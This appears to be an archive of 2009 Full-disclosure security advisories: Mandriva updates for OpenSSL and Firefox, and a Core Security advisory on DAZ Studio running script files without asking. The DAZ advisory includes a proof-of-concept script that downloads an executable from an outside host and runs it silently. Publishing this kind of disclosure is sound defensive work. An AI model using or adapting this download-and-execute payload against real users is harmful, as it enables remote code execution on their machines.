vulnerabilities has been identified and fixed in OpenSSL: The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377) Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378) Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379). ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386). The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug. (CVE-2009-1387) The NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409). A regression was found with the self signed certificate signatures checking after applying the fix for CVE-2009-2409. An upstream patch has been applied to address this issue. Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://marc.info/?l=openssl-cvs&m=124508133203041&w=2 https://qa.mandriva.com/54349 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 5e5cebd5417fa8da31e5fb439832f4a9 2008.0/i586/libopenssl0.9.8-0.9.8e-8.4mdv2008.0.i586.rpm 56b10d47a9c0522a1d685851301ec3ed 2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.4mdv2008.0.i586.rpm c5689cbe8983c60b21f885bb417fa93d 2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.i586.rpm f6998620b5cf142898da1b029e055756 2008.0/i586/openssl-0.9.8e-8.4mdv2008.0.i586.rpm 81ed32097a16b03713c16e46e8fae15a 2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4a8bfb0af6be2dc3b998b34692df9c03 2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.4mdv2008.0.x86_64.rpm a38da1e95cd3883a486cf67312031591 2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm 82fd48fc11975ae589b7818dce0a9973 2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm a567f0cc7825b1f73e749d96f50a2f2e 2008.0/x86_64/openssl-0.9.8e-8.4mdv2008.0.x86_64.rpm 81ed32097a16b03713c16e46e8fae15a 2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF/AwmqjQ0CJFipgRAqx6AKD1ChFOYXYPbC115frSvdh0EwAj5ACgwKve Ipm8WlM383UAMDSK5xSeL5c= =zSbn -----END PGP SIGNATURE----- From advisories at coresecurity.com Thu Dec 3 20:07:51 2009 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Thu, 03 Dec 2009 17:07:51 -0300 Subject: [Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution Message-ID: <4B181A97.5020505@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ DAZ Studio Arbitrary Command Execution 1. *Advisory Information* Title: DAZ Studio Arbitrary Command Execution Advisory Id: CORE-2009-0911 Advisory URL: http://www.coresecurity.com/content/dazstudio-scripting-injection Date published: 2009-12-02 Date of last update: 2009-12-01 Vendors contacted: DAZ Release mode: User release 2. *Vulnerability Information* Class: Insufficient UI Warning of Dangerous Operations [CWE-357] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 37176 CVE Name: CVE-2009-4148 3. *Vulnerability Description* DAZ Studio [2] is a 3D figure illustration/animation application released by DAZ 3D Inc. DAZ Studio can be accessed via a scripting language which allows for quite a bit of diversity in tool creation. DAZ Studio does not ask for any confirmation from the user prior to executing a scripting file with any of the following extensions: .ds, .dsa, .dse, .dsb. An attacker could abuse the scripting interface by enticing an unsuspecting user to open a malicious scripting file, thus obtaining remote code execution. 4. *Vulnerable packages* . DAZ Studio 2.3.3.161 . DAZ Studio 2.3.3.163 . DAZ Studio 3.0.1.135 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. To prevent the accidental execution of malicious scripting files you can disable the default file association of the dangerous file extensions in the Windows Explorer. The following KB article from Microsoft describe how to deassociate a file extension. http://support.microsoft.com/kb/307859 6. *Credits* This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies during Bugweek 2009 [1]. 7. *Technical Description / Proof of Concept Code* The following Proof of Concept .ds file demonstrates remote code execution by downloading and executing putty in the context of DAZ Studio. /----- // DAZ Studio PoC var oFile = new DzFile("d:\\test.js"); oFile.open(2); oFile.write("s=WScript.CreateObject(\'WScript.Shell\');o=WScript.CreateObject(\'ADODB.Stream\');e=s.Environment(\'Process\');u=\'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\';b=e.Item(\'TEMP\')+\'\\\\agent.exe\';try{x=new ActiveXObject(\'Microsoft.XMLHTTP\');}catch(e){x=new ActiveXObject(\'MSXML2.ServerXMLHTTP\');}if(!x)exit(0);x.open(\'GET\',u,0);x.send(null);d=x.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(d);o.SaveToFile(b,2);s.Run(b,0);\r\n"); oFile.close() var oProcess = new DzProcess(["wscript", "d:\\test.js"]); oProcess.start(); - -----/ 8. *Report Timeline* . 2009-11-06: Core Security Technologies completes a support form trying to reach a security contact from DAZ. . 2009-11-06: Core receives an email saying that Core contact email was not recognised as a registered email. . 2009-11-06: Core completes a registration form to be able to contact the support team. . 2009-11-13: Since DAZ support team didn't respond to any mail, Core contacts CERT trying to obtain a valid security contact at DAZ. . 2009-11-16: CERT acknowledges the comunication, and Core reschedules the advisory to November 30th, 2009 based on CERT recommendations. . 2009-11-18: CERT communicates that the vendor doesn't seem familiar with vulnerability reporting/disclosure, and request additional information about the vulnerability. . 2009-11-18: CERT contacted DAZ four times between 11/16 and 11/30. . 2009-11-19: Core replies that the issue is a script injection vulnerability. . 2009-11-30: DAZ did not wish to provide contact information. . 2009-12-03: The advisory CORE-2009-0911 is published. 9. *References* [1] The author participated in Core Bugweek 2009 as member of the team "Gimbal Lock N Load". [2] DAZ Studio: http://www.daz3d.com/i/software/daz_studio3?_m=d 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksYGpcACgkQyNibggitWa3lrwCeKY5DAHCr9PaZ1Dk6FqMcrbUx mR8AoK6zHf4Ns/xzngH5kT+f4MDwbUpF =l/I+ -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 3 21:23:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Dec 2009 22:23:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:290-1 ] firefox Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:290-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : firefox Date : December 2, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: Security issues were identified and fixed in firefox 3.0.x: Security researcher Alin Rad Pop of Secunia Research reported a heap-based buffer overflow in Mozilla's string to floating point number conversion routines. Using this vulnerability an attacker could craft some malicious JavaScript code containing a very long string to be converted to a floating point number which would result in improper memory allocation and the execution of an arbitrary memory location. This vulnerability could thus be leveraged by the attacker to run arbitrary code on a victim's computer (CVE-2009-1563). Security researcher Jeremy Brown reported that the file naming scheme used for downloading a file which already exists in the downloads folder is predictable. If an attacker had local access to a victim's computer and knew the name of a file the victim intended to open through the Download Manager, he could use this vulnerability to place a malicious file in the world-writable directory used to save temporary downloaded files and cause the browser to choose the incorrect file when opening it. Since this attack requires local access to the victim's machine, the severity of this vulnerability was determined to be low (CVE-2009-3274). Security researcher Paul Stone reported that a user's form history, both from web content as well as the smart location bar, was vulnerable to theft. A malicious web page could synthesize events such as mouse focus and key presses on behalf of the victim and trick the browser into auto-filling the form fields with history entries and then reading the entries (CVE-2009-3370). Security researcher Marco C. reported a flaw in the parsing of regular expressions used in Proxy Auto-configuration (PAC) files. In certain cases this flaw could be used by an attacker to crash a victim's browser and run arbitrary code on their computer. Since this vulnerability requires the victim to have PAC configured in their environment with specific regular expresssions which can trigger the crash, the severity of the issue was determined to be moderate (CVE-2009-3372). Security research firm iDefense reported that researcher regenrecht discovered a heap-based buffer overflow in Mozilla's GIF image parser. This vulnerability could potentially be used by an attacker to crash a victim's browser and run arbitrary code on their computer (CVE-2009-3373). Mozilla security researcher moz_bug_r_a4 reported that the XPCOM utility XPCVariant::VariantDataToJS unwrapped doubly-wrapped objects before returning them to chrome callers. This could result in chrome privileged code calling methods on an object which had previously been created or modified by web content, potentially executing malicious JavaScript code with chrome privileges (CVE-2009-3374). Security researcher Gregory Fleischer reported that text within a selection on a web page can be read by JavaScript in a different domain using the document.getSelection function, violating the same-origin policy. Since this vulnerability requires user interaction to exploit, its severity was determined to be moderate (CVE-2009-3375). Mozilla security researchers Jesse Ruderman and Sid Stamm reported that when downloading a file containing a right-to-left override character (RTL) in the filename, the name displayed in the dialog title bar conflicts with the name of the file shown in the dialog body. An attacker could use this vulnerability to obfuscate the name and file extension of a file to be downloaded and opened, potentially causing a user to run an executable file when they expected to open a non-executable file (CVE-2009-3376). Mozilla developers and community members identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. Vladimir Vukicevic, Jesse Ruderman, Martijn Wargers, Daniel Banchero, David Keeler, and Boris Zbarsky reported crashes in the browser engine which affected both Firefox 3 and Firefox 3.5 (CVE-2009-3380). Carsten Book reported a crash in the browser engine which affected only Firefox 3 (CVE-2009-3382). This update provides the latest Mozilla Firefox 3.0.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as updates. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3274 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3370 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3372 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3373 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3374 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3375 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3376 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3380 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3382 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.15 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 12373cd058ce529a7c9c196eccdf1cfe 2008.0/i586/firefox-3.0.15-0.1mdv2008.0.i586.rpm 6a164ea511053b6acf425aaf95994c5d 2008.0/i586/firefox-af-3.0.15-0.1mdv2008.0.i586.rpm e05c67424d3a3c789f3a5c0d9a22c458 2008.0/i586/firefox-ar-3.0.15-0.1mdv2008.0.i586.rpm ccc54fc54d92a094c058025ed9b52148 2008.0/i586/firefox-be-3.0.15-0.1mdv2008.0.i586.rpm 8bc4de7c8b9e4fbcdf33aa41780a94f4 2008.0/i586/firefox-bg-3.0.15-0.1mdv2008.0.i586.rpm cdc167d6b6e4f69e71a6aeff1f60e0b0 2008.0/i586/firefox-bn-3.0.15-0.1mdv2008.0.i586.rpm 86ad88b3edb3336dc6ea501e82d19137 2008.0/i586/firefox-ca-3.0.15-0.1mdv2008.0.i586.rpm dcb1cdf0167e1de986956843a3b893c2 2008.0/i586/firefox-cs-3.0.15-0.1mdv2008.0.i586.rpm 8c3dac5a041584513f8b7437c67331c1 2008.0/i586/firefox-cy-3.0.15-0.1mdv2008.0.i586.rpm b96341b21877652410c92399d041ca09 2008.0/i586/firefox-da-3.0.15-0.1mdv2008.0.i586.rpm 8b3072fbc2b14f302e033d7ffae9d65b 2008.0/i586/firefox-de-3.0.15-0.1mdv2008.0.i586.rpm 3e6da893be209cbf4769aa6ab6c7f3f0 2008.0/i586/firefox-el-3.0.15-0.1mdv2008.0.i586.rpm d1a45a2a1ff45724c0bac1f607815623 2008.0/i586/firefox-en_GB-3.0.15-0.1mdv2008.0.i586.rpm c17da9640a2007fb9394621fe4da78a9 2008.0/i586/firefox-eo-3.0.15-0.1mdv2008.0.i586.rpm 51c9480aa70a8801244a418f76f086b3 2008.0/i586/firefox-es_AR-3.0.15-0.1mdv2008.0.i586.rpm b5b36cb4e1052fdcd4287a1a54cb23aa 2008.0/i586/firefox-es_ES-3.0.15-0.1mdv2008.0.i586.rpm cca12f10e0d64087f0bd6fc547854e76 2008.0/i586/firefox-et-3.0.15-0.1mdv2008.0.i586.rpm 661620c045f2fb463be665cf80e0bd90 2008.0/i586/firefox-eu-3.0.15-0.1mdv2008.0.i586.rpm 64b6c6262792f6f192278cb93d0b879d 2008.0/i586/firefox-fi-3.0.15-0.1mdv2008.0.i586.rpm 669794223def8db189a716a9791b703b 2008.0/i586/firefox-fr-3.0.15-0.1mdv2008.0.i586.rpm aa5e4bd61658576530996b6c225a1e73 2008.0/i586/firefox-fy-3.0.15-0.1mdv2008.0.i586.rpm eb7a96e511de721728d1824d3936059e 2008.0/i586/firefox-ga_IE-3.0.15-0.1mdv2008.0.i586.rpm fc2920befc11e1839546e7f79f3193c6 2008.0/i586/firefox-gl-3.0.15-0.1mdv2008.0.i586.rpm 74a5fe7427a0906441c5c46d5a308291 2008.0/i586/firefox-gu_IN-3.0.15-0.1mdv2008.0.i586.rpm 9e5a743f3ec1a9d9251643bdf91c5811 2008.0/i586/firefox-he-3.0.15-0.1mdv2008.0.i586.rpm 9aa5637651f8a841ad40a816f24b22f6 2008.0/i586/firefox-hi-3.0.15-0.1mdv2008.0.i586.rpm 07604280c814bae760b67a13df870342 2008.0/i586/firefox-hu-3.0.15-0.1mdv2008.0.i586.rpm 35baa370e5f6948058b2f39fe6b90f5f 2008.0/i586/firefox-id-3.0.15-0.1mdv2008.0.i586.rpm b55b606375fb66d82a05d796cd4a3757 2008.0/i586/firefox-is-3.0.15-0.1mdv2008.0.i586.rpm 815e14f6edb1b526fbb149256625d16b 2008.0/i586/firefox-it-3.0.15-0.1mdv2008.0.i586.rpm e1aba26dd9f6f081f7ac02d7d05baffb 2008.0/i586/firefox-ja-3.0.15-0.1mdv2008.0.i586.rpm ffbfe62f6ae84e75631e6b0518c25021 2008.0/i586/firefox-ka-3.0.15-0.1mdv2008.0.i586.rpm 75e33c252b9f80afb35cdd5387c5d734 2008.0/i586/firefox-kn-3.0.15-0.1mdv2008.0.i586.rpm 46e747a886a35c3f7630e24d868c98d8 2008.0/i586/firefox-ko-3.0.15-0.1mdv2008.0.i586.rpm 3f62f86595774fdba45fdd7d7b325c52 2008.0/i586/firefox-ku-3.0.15-0.1mdv2008.0.i586.rpm 78b768a8f407689f4971bc651d1d52db 2008.0/i586/firefox-lt-3.0.15-0.1mdv2008.0.i586.rpm 9fed2d1e0daf10ac8f737c91301554ce 2008.0/i586/firefox-lv-3.0.15-0.1mdv2008.0.i586.rpm ba96c671527e07cd083194d8f6ae9dc7 2008.0/i586/firefox-mk-3.0.15-0.1mdv2008.0.i586.rpm 872974c1d04df5f03df1cf4e191ad282 2008.0/i586/firefox-mn-3.0.15-0.1mdv2008.0.i586.rpm 089286a24b365b6068917ba88a59b07c 2008.0/i586/firefox-mr-3.0.15-0.1mdv2008.0.i586.rpm 11fb3a65834c081d1d806d46c0b76f9b 2008.0/i586/firefox-nb_NO-3.0.15-0.1mdv2008.0.i586.rpm c39785e5d4652793a48ff3a9fb31a577 2008.0/i586/firefox-nl-3.0.15-0.1mdv2008.0.i586.rpm ff43bf0f9fe09d37897f1bd066fcb14e 2008.0/i586/firefox-nn_NO-3.0.15-0.1mdv2008.0.i586.rpm 570554e3e763d4b4fe6f83ad995e96c2 2008.0/i586/firefox-oc-3.0.15-0.1mdv2008.0.i586.rpm 384e14e90b68d0f60df5485e7a6d3b14 2008.0/i586/firefox-pa_IN-3.0.15-0.1mdv2008.0.i586.rpm eb9de20b54401f4d8d080b1e740f3e62 2008.0/i586/firefox-pl-3.0.15-0.1mdv2008.0.i586.rpm 8299f2a8cd8470cf517e208654fc47be 2008.0/i586/firefox-pt_BR-3.0.15-0.1mdv2008.0.i586.rpm f132072df971b40352311db4de3a04b5 2008.0/i586/firefox-pt_PT-3.0.15-0.1mdv2008.0.i586.rpm b5826e9969484186b9383e51a23062ee 2008.0/i586/firefox-ro-3.0.15-0.1mdv2008.0.i586.rpm b4b1db2ba5f2a5363f990e3f839a6b1b 2008.0/i586/firefox-ru-3.0.15-0.1mdv2008.0.i586.rpm 1578873755476c782f0393cae52d930f 2008.0/i586/firefox-si-3.0.15-0.1mdv2008.0.i586.rpm 8416d97ab349f605105a3a0488cf50af 2008.0/i586/firefox-sk-3.0.15-0.1mdv2008.0.i586.rpm 452066cbd6ecc439a126a69de6126ab1 2008.0/i586/firefox-sl-3.0.15-0.1mdv2008.0.i586.rpm 8d6dcc54c823a1b0d15c9327471421f8 2008.0/i586/firefox-sq-3.0.15-0.1mdv2008.0.i586.rpm a36479587244475ebfe78905f229d6d5 2008.0/i586/firefox-sr-3.0.15-0.1mdv2008.0.i586.rpm cad5437cdde77aa575ce9f30d7627436 2008.0/i586/firefox-sv_SE-3.0.15-0.1mdv2008.0.i586.rpm df470c3cc420f9baa09b92a3fda3f5b8 2008.0/i586/firefox-te-3.0.15-0.1mdv2008.0.i586.rpm 93e159f834bf3bb24b2235cd62037308 2008.0/i586/firefox-th-3.0.15-0.1mdv2008.0.i586.rpm 6955c3b49e9eb861b1547f48818dc063 2008.0/i586/firefox-tr-3.0.15-0.1mdv2008.0.i586.rpm 7fd0b0839c5041831b7ee923ad6cebbf 2008.0/i586/firefox-uk-3.0.15-0.1mdv2008.0.i586.rpm e5244bb6d3959487cdce1173567869ff 2008.0/i586/firefox-zh_CN-3.0.15-0.1mdv2008.0.i586.rpm a726035db84c597ccf8aff9f5f62c5f6 2008.0/i586/firefox-zh_TW-3.0.15-0.1mdv2008.0.i586.rpm ae7ae10d008d97d749c65304a336069d 2008.0/i586/librarian0-0.8.0-0.1mdv2008.0.i586.rpm 73f76546da72860a65abe38c2799b7e1 2008.0/i586/librarian-devel-0.8.0-0.1mdv2008.0.i586.rpm 11274dc82ea59d1756cd69ace5e49f92 2008.0/i586/libtotem-plparser7-2.20.1-1.9mdv2008.0.i586.rpm bab6e437dc6afea6a3b4dfdf37a7aa6b 2008.0/i586/libtotem-plparser-devel-2.20.1-1.9mdv2008.0.i586.rpm d8118e94809cd1c1b7ccfa1475c0632b 2008.0/i586/libxulrunner1.9-1.9.0.15-0.1mdv2008.0.i586.rpm 34792ea8022691987581fc213d6c0105 2008.0/i586/libxulrunner-devel-1.9.0.15-0.1mdv2008.0.i586.rpm 57013e308fd8bdefc83b6ba2f506e184 2008.0/i586/libxulrunner-unstable-devel-1.9.0.15-0.1mdv2008.0.i586.rpm c2c818aabd86eb82f07ab6f8301abadb 2008.0/i586/mozilla-firefox-ext-blogrovr-1.1.798-0.1mdv2008.0.i586.rpm 95fa8a898d2ea637e1de0b834d9652ce 2008.0/i586/mozilla-firefox-ext-foxmarks-2.7.2-0.1mdv2008.0.i586.rpm 6916055a5de229dd9eade32fa95c2f8e 2008.0/i586/mozilla-firefox-ext-scribefire-3.2.3-0.1mdv2008.0.i586.rpm 711d85e93f14e8fff50d46d14f01c7ad 2008.0/i586/rarian-0.8.0-0.1mdv2008.0.i586.rpm ad03e43345dc80f155f4f32023f18059 2008.0/i586/totem-2.20.1-1.9mdv2008.0.i586.rpm 5327b31f7b433742af9c1c58d729001d 2008.0/i586/totem-common-2.20.1-1.9mdv2008.0.i586.rpm 8c38cf847129ee96812425f67a59a806 2008.0/i586/totem-gstreamer-2.20.1-1.9mdv2008.0.i586.rpm 93dc78c0c032aaadda66c3e50f300cae 2008.0/i586/totem-mozilla-2.20.1-1.9mdv2008.0.i586.rpm 9d1d1929166a589a7728fb4d6f390c42 2008.0/i586/totem-mozilla-gstreamer-2.20.1-1.9mdv2008.0.i586.rpm 65ead511b3f3821e14296d7765f635a0 2008.0/i586/xulrunner-1.9.0.15-0.1mdv2008.0.i586.rpm f5ac07e5e16fa4ae664c26daa737c982 2008.0/i586/yelp-2.22.1-0.1mdv2008.0.i586.rpm d179874cb1679378705722a046b2e79f 2008.0/SRPMS/firefox-3.0.15-0.1mdv2008.0.src.rpm 5d93c52d92e9d91e9f09789499776cbb 2008.0/SRPMS/firefox-l10n-3.0.15-0.1mdv2008.0.src.rpm eb9675d488261eb7c7b48bf517698b08 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.798-0.1mdv2008.0.src.rpm 86df6dc3efa632aa71d6600e6ac5c1de 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.7.2-0.1mdv2008.0.src.rpm c5690af5e35d01db5a626e206e83f6e0 2008.0/SRPMS/mozilla-firefox-ext-scribefire-3.2.3-0.1mdv2008.0.src.rpm d6e2ab7654052e0795b97fa09b28f49c 2008.0/SRPMS/rarian-0.8.0-0.1mdv2008.0.src.rpm b9d7680838c669ec341b689b83979d01 2008.0/SRPMS/totem-2.20.1-1.9mdv2008.0.src.rpm 3a59f30ec62603a99ad52421133d081b 2008.0/SRPMS/xulrunner-1.9.0.15-0.1mdv2008.0.src.rpm 9a2e88de84689ebf04c21e677bea5bb8 2008.0/SRPMS/yelp-2.22.1-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 3c230c33386ba3cfabb8869715bd36be 2008.0/x86_64/firefox-3.0.15-0.1mdv2008.0.x86_64.rpm a3d5c1b0434526f960aaa622bc635c5a 2008.0/x86_64/firefox-af-3.0.15-0.1mdv2008.0.x86_64.rpm 7d89d6cf062a511b1c98167c06ecc62d 2008.0/x86_64/firefox-ar-3.0.15-0.1mdv2008.0.x86_64.rpm 1b1c232a3c9cf9044a60ff146f1d3503 2008.0/x86_64/firefox-be-3.0.15-0.1mdv2008.0.x86_64.rpm b1d5d714711c3294fb19c2ccba5d68b0 2008.0/x86_64/firefox-bg-3.0.15-0.1mdv2008.0.x86_64.rpm 8150de0f197fab5384f5b3c208594981 2008.0/x86_64/firefox-bn-3.0.15-0.1mdv2008.0.x86_64.rpm d638801431490a245280423af1baab4e 2008.0/x86_64/firefox-ca-3.0.15-0.1mdv2008.0.x86_64.rpm d0d3aef5c13a786f7b60dd4a48d8ca6c 2008.0/x86_64/firefox-cs-3.0.15-0.1mdv2008.0.x86_64.rpm 5369517bc501038283c1b44a82821b58 2008.0/x86_64/firefox-cy-3.0.15-0.1mdv2008.0.x86_64.rpm 56e6c89cbeb52ff129eec5c7fbde8974 2008.0/x86_64/firefox-da-3.0.15-0.1mdv2008.0.x86_64.rpm 152ce37cb51a4e65ac8b8753db361516 2008.0/x86_64/firefox-de-3.0.15-0.1mdv2008.0.x86_64.rpm acbbabc8d1bb05288c5d55ffade711ad 2008.0/x86_64/firefox-el-3.0.15-0.1mdv2008.0.x86_64.rpm 95d60fb96e4302f2fb4fbfda6523e59d 2008.0/x86_64/firefox-en_GB-3.0.15-0.1mdv2008.0.x86_64.rpm 26d0b6ac1e266bac32ffc0ddc631c725 2008.0/x86_64/firefox-eo-3.0.15-0.1mdv2008.0.x86_64.rpm 5dc63055cdce1c2c6d302bd4b6a4f981 2008.0/x86_64/firefox-es_AR-3.0.15-0.1mdv2008.0.x86_64.rpm 473c662a84ef189ad264f0cdde1b9c9d 2008.0/x86_64/firefox-es_ES-3.0.15-0.1mdv2008.0.x86_64.rpm fb50f2d6548bc2328b8a5974a5d827e7 2008.0/x86_64/firefox-et-3.0.15-0.1mdv2008.0.x86_64.rpm 5900c2879a24f47656643a948e37819a 2008.0/x86_64/firefox-eu-3.0.15-0.1mdv2008.0.x86_64.rpm 3393470f7c1ce272e3a3ff62e5a11de4 2008.0/x86_64/firefox-fi-3.0.15-0.1mdv2008.0.x86_64.rpm 7dd11d4aa9d8b5fb6dc5a115dcae3623 2008.0/x86_64/firefox-fr-3.0.15-0.1mdv2008.0.x86_64.rpm 91ead9a397668ab5daa1c1388ac373de 2008.0/x86_64/firefox-fy-3.0.15-0.1mdv2008.0.x86_64.rpm 821f5064a655275ba44d41b0339a79b4 2008.0/x86_64/firefox-ga_IE-3.0.15-0.1mdv2008.0.x86_64.rpm d5c0581c078bf7539bb7996b05be43e9 2008.0/x86_64/firefox-gl-3.0.15-0.1mdv2008.0.x86_64.rpm ac590e4f59fbdc7b01d505da987e0c78 2008.0/x86_64/firefox-gu_IN-3.0.15-0.1mdv2008.0.x86_64.rpm 56db6b3d57ce43ea9f58d83069ff96e2 2008.0/x86_64/firefox-he-3.0.15-0.1mdv2008.0.x86_64.rpm 47a5e03dd45c9aa4bf0d9d9786ccfadf 2008.0/x86_64/firefox-hi-3.0.15-0.1mdv2008.0.x86_64.rpm 8a320e187bc815ae2a32f5b3733a0547 2008.0/x86_64/firefox-hu-3.0.15-0.1mdv2008.0.x86_64.rpm 2b0010d9f964a4be72645e382979f155 2008.0/x86_64/firefox-id-3.0.15-0.1mdv2008.0.x86_64.rpm 52ab19597915e18f333becde60125b3a 2008.0/x86_64/firefox-is-3.0.15-0.1mdv2008.0.x86_64.rpm ac290289eabbefd33b0fc02608ecf60e 2008.0/x86_64/firefox-it-3.0.15-0.1mdv2008.0.x86_64.rpm fb1fb664b1741b799e96fd7c5d83d70b 2008.0/x86_64/firefox-ja-3.0.15-0.1mdv2008.0.x86_64.rpm 98f1277a545a1842d52962e2c853c7a4 2008.0/x86_64/firefox-ka-3.0.15-0.1mdv2008.0.x86_64.rpm ffde944180d2862d36b0f7cf697887d3 2008.0/x86_64/firefox-kn-3.0.15-0.1mdv2008.0.x86_64.rpm 7171b91477d7da795aba85395c189eeb 2008.0/x86_64/firefox-ko-3.0.15-0.1mdv2008.0.x86_64.rpm bacb6d1ecc13e3395ee1d41a94cc1945 2008.0/x86_64/firefox-ku-3.0.15-0.1mdv2008.0.x86_64.rpm ff22e0c6e1cb984a237c683292da8df6 2008.0/x86_64/firefox-lt-3.0.15-0.1mdv2008.0.x86_64.rpm d4f7fd19782cb6355f25eca9f387371b 